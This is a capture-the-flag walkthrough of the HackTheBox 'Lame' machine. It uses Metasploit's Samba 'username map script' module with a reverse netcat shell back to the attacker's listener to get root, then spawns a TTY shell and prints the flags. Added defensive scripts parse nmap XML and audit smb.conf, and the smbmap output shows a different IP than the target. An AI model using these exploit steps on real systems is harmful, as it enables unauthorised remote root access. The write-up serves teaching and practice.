HackTheBox - Lame
Initial Enumeration
nmap -sC -sV -v --min-rate=1000 10.10.10.3 -oA lame
Nmap scan report for 10.10.10.3
Host is up (0.012s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.26
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2024-07-18T07:36:03-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 1h52m42s, deviation: 2h49m46s, median: -7m20s
Since anonymous FTP login is allowed, I attempted to sign in to the FTP server anonymously. However, I found that there were no files available in the FTP share.
I then attempted to interact with the SMB shares. Using smbmap, I found that I could enumerate shares through a null session. However, the null user only had access to the tmp share.
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.10.10.40:445 Name: 10.10.10.40 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
opt NO ACCESS
IPC$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
Looking through the tmp share, we find that there is nothing of note, as the null user does not have access to most files within this share.
Foothold
If we review the nmap scan, we find that this box is running the following services and versions:
- FTP: vsFTPd 2.3.4
- SMB: Samba smbd 3.0.20-Debian
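The versions listed above were read off the human-readable scan. Because the scan was saved with -oA lame, nmap also wrote lame.xml, which is the form to parse when this triage has to be repeated on many hosts or compared against what a host is supposed to expose. The script below is an added example, not code from the original write-up: it parses nmap XML into a service inventory and diffs it against a baseline of expected ports. The XML is constructed to mirror the scan quoted above, and the baseline (only SSH expected on the host) is an assumption made for illustration.

```python
"""Turn the XML that `nmap -oA lame` writes (lame.xml) into a service
inventory and diff it against an expected-exposure baseline.

Added example, not part of the original write-up. The XML below is
constructed to mirror the scan quoted in the write-up; the baseline of
expected ports is an assumption.
"""
import xml.etree.ElementTree as ET

# Constructed, abridged nmap XML reproducing the four open ports above.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sC -sV -v --min-rate=1000 10.10.10.3 -oA lame" version="7.94">
<host>
<status state="up" reason="echo-reply"/>
<address addr="10.10.10.3" addrtype="ipv4"/>
<ports>
<extraports state="filtered" count="996"/>
<port protocol="tcp" portid="21"><state state="open" reason="syn-ack"/>
  <service name="ftp" product="vsftpd" version="2.3.4" method="probed" conf="10"/></port>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/>
  <service name="ssh" product="OpenSSH" version="4.7p1 Debian 8ubuntu1" extrainfo="protocol 2.0"/></port>
<port protocol="tcp" portid="139"><state state="open" reason="syn-ack"/>
  <service name="netbios-ssn" product="Samba smbd" version="3.X - 4.X" hostname="WORKGROUP"/></port>
<port protocol="tcp" portid="445"><state state="open" reason="syn-ack"/>
  <service name="netbios-ssn" product="Samba smbd" version="3.0.20-Debian" hostname="WORKGROUP"/></port>
</ports>
</host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return one record per open port: host, port, protocol, service, product, version."""
    root = ET.fromstring(xml_text)
    inventory = []
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        addr = addr_el.get("addr")
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports are not exposure
            svc = port.find("service")  # absent when version detection had nothing to say
            inventory.append({
                "host": addr,
                "port": int(port.get("portid")),
                "protocol": port.get("protocol"),
                "service": svc.get("name", "") if svc is not None else "",
                "product": svc.get("product", "") if svc is not None else "",
                "version": svc.get("version", "") if svc is not None else "",
            })
    inventory.sort(key=lambda r: (r["host"], r["port"]))
    return inventory


def diff_against_baseline(inventory, baseline):
    """Compare observed open TCP ports with the ports each host is expected to expose.

    baseline: {host: set(expected_tcp_ports)}. A host missing from the baseline
    is treated as expecting nothing, so every open port on it is flagged.
    """
    observed = {}
    for rec in inventory:
        if rec["protocol"] == "tcp":
            observed.setdefault(rec["host"], set()).add(rec["port"])
    unexpected, missing = [], []
    for host in sorted(set(observed) | set(baseline)):
        expected = baseline.get(host, set())
        seen = observed.get(host, set())
        unexpected.extend((host, p) for p in sorted(seen - expected))
        missing.extend((host, p) for p in sorted(expected - seen))
    return {"unexpected": unexpected, "missing": missing}


def report(inventory, baseline):
    """Human-readable summary: one line per open port, then the baseline diff."""
    lines = []
    for rec in inventory:
        banner = " ".join(x for x in (rec["product"], rec["version"]) if x)
        lines.append(f'{rec["host"]}:{rec["port"]}/{rec["protocol"]} {rec["service"]} ({banner or "no banner"})')
    diff = diff_against_baseline(inventory, baseline)
    for host, port in diff["unexpected"]:
        lines.append(f"UNEXPECTED exposure: {host}:{port} is open but not in the baseline")
    for host, port in diff["missing"]:
        lines.append(f"MISSING service: {host}:{port} expected open but not observed")
    return "\n".join(lines)


if __name__ == "__main__":
    # Assumed baseline: only SSH is meant to be reachable on this host.
    print(report(parse_nmap_xml(SAMPLE_NMAP_XML), {"10.10.10.3": {22}}))
```

Run against a real lame.xml by reading the file into parse_nmap_xml and supplying the baseline your asset inventory says each host should expose; the three UNEXPECTED lines for 21, 139 and 445 are the same list the write-up derives by eye.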
If we search for possible exploits:
$ searchsploit vsftpd 2.3.4
--------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb
--------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
$ searchsploit samba 3.0.20
--------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC) | linux_x86/dos/36741.py
--------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
We will find two potential exploits that we can use.
In this case, however, the vsFTPd exploit does not work. The explanation can be found here.
Hence, we will proceed to use the SMB exploit instead. As our Samba version is 3.0.20, the second exploit (‘Username map script’) is of interest to us.
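Before moving on to the exploit, it is worth looking at the same finding from the configuration side. The module named above depends on the username map script directive being set in smb.conf, and the enumeration earlier showed two more configuration weaknesses on the same server: a null session could list shares and write to tmp, and message signing was disabled. The audit below is an added example, not part of the write-up and not Samba's own tooling: it parses an smb.conf and flags those settings, shown against a constructed weak configuration that would reproduce the observations above and a hardened version of the same file. Neither configuration is the box's real smb.conf; the script path and share paths in them are placeholders.

```python
"""Audit an smb.conf for the settings behind the findings above: null-session
share listing, a guest-writable share, unsigned SMB, and the "username map
script" hook that the Metasploit module targets. Added example, not part of
the original write-up; both configurations are constructed for illustration.
"""
import configparser
import re

# Constructed: a configuration that would reproduce the write-up's observations
# (null session lists shares, tmp is READ/WRITE for the guest, signing off). Placeholder paths.
WEAK_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   security = user
   map to guest = bad user
   username map script = /etc/samba/scripts/mapusers.sh
   server signing = disabled

[tmp]
   comment = oh noes!
   path = /tmp
   read only = no
   guest ok = yes

[opt]
   path = /opt
   guest ok = no
"""

# Constructed: the same server with the risky settings removed.
HARDENED_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   security = user
   map to guest = never
   server signing = mandatory

[tmp]
   path = /tmp
   read only = no
   guest ok = no
"""


def parse_smb_conf(text):
    """Parse smb.conf into {section: {key: value}}. Samba matches parameter names
    case-insensitively and ignores whitespace inside them, so keys are normalised that way."""
    parser = configparser.RawConfigParser(strict=False, allow_no_value=True, delimiters=("=",))
    parser.optionxform = lambda key: re.sub(r"\s+", "", key.strip().lower())
    parser.read_string(text)
    return {s.lower(): dict(parser.items(s)) for s in parser.sections()}


def smb_bool(value):
    """Samba booleans: yes/true/1 are true, anything else is false."""
    return value.strip().lower() in ("yes", "true", "1")


def share_is_writable(share):
    """Simplified: 'read only' first, then its synonyms writable/writeable (Samba itself
    lets the last one set win); the Samba default is read only = yes."""
    if "readonly" in share:
        return not smb_bool(share["readonly"])
    for key in ("writable", "writeable"):
        if key in share:
            return smb_bool(share[key])
    return False


def audit_smb_conf(text):
    """Return (severity, code, message) findings for the risky settings."""
    conf = parse_smb_conf(text)
    g = conf.get("global", {})
    findings = []
    if "usernamemapscript" in g:
        findings.append(("high", "username_map_script",
                         "username map script = %s: on Samba 3.0.20 through 3.0.25rc3 this "
                         "option is remotely exploitable for command execution (the module "
                         "used above); remove it or upgrade Samba" % g["usernamemapscript"]))
    if g.get("maptoguest", "never").strip().lower() != "never":
        findings.append(("medium", "null_session_mapping",
                         "map to guest = %s lets unauthenticated clients fall through to the "
                         "guest account and enumerate shares" % g["maptoguest"]))
    if g.get("serversigning", "auto").strip().lower() != "mandatory":
        findings.append(("medium", "signing_not_enforced",
                         "server signing is not mandatory, so SMB messages are not "
                         "integrity-protected (nmap reported message_signing: disabled)"))
    for name, share in conf.items():
        if name != "global" and smb_bool(share.get("guestok", "no")) and share_is_writable(share):
            findings.append(("high", "guest_writable_share:" + name,
                             "share [%s] is writable by the guest account" % name))
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_SMB_CONF), ("hardened", HARDENED_SMB_CONF)):
        print("==", label, "==")
        for severity, _, message in audit_smb_conf(conf) or [("info", "", "no findings")]:
            print(f"[{severity}] {message}")
```

The weak configuration yields four findings and the hardened one none. The parser relies on configparser because smb.conf is INI-shaped; it does not resolve include directives or per-user macros, so point it at the fully expanded file (for example the output of testparm -s) when auditing a real server.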
We can thus start Metasploit using msfconsole -q.
Then, from the console, look for the Username map script exploit and use it.
msf6 > search usermap_script
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
<SNIP>
msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.16.110.129 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.14.26
LHOST => 10.10.14.26
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
Finally, run the exploit.
msf6 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP handler on 10.10.14.26:4444
[*] Command shell session 1 opened (10.10.14.26:4444 -> 10.10.10.3:44966) at 2024-07-18 08:34:42 -0400
From here, it appears that a shell session has started, but we do not see the meterpreter prompt. This implies that this is a standard shell session instead of a meterpreter session.
To confirm that the shell is live, we can enter whoami and should get a response.
whoami
root
Now, we can simply upgrade our shell session to an interactive TTY session.
which python
/usr/bin/python
python -c 'import pty; pty.spawn("/bin/bash")'
root@lame:/# pwd
pwd
/
Finally, we can obtain the flags.
root@lame:/root# cat root.txt
cat root.txt
3e3ca46a0b10dc42b32fe2493a2a3de7
root@lame:/home/makis# cat user.txt
cat user.txt
024ddf63a92e34e9259c85fea398ce20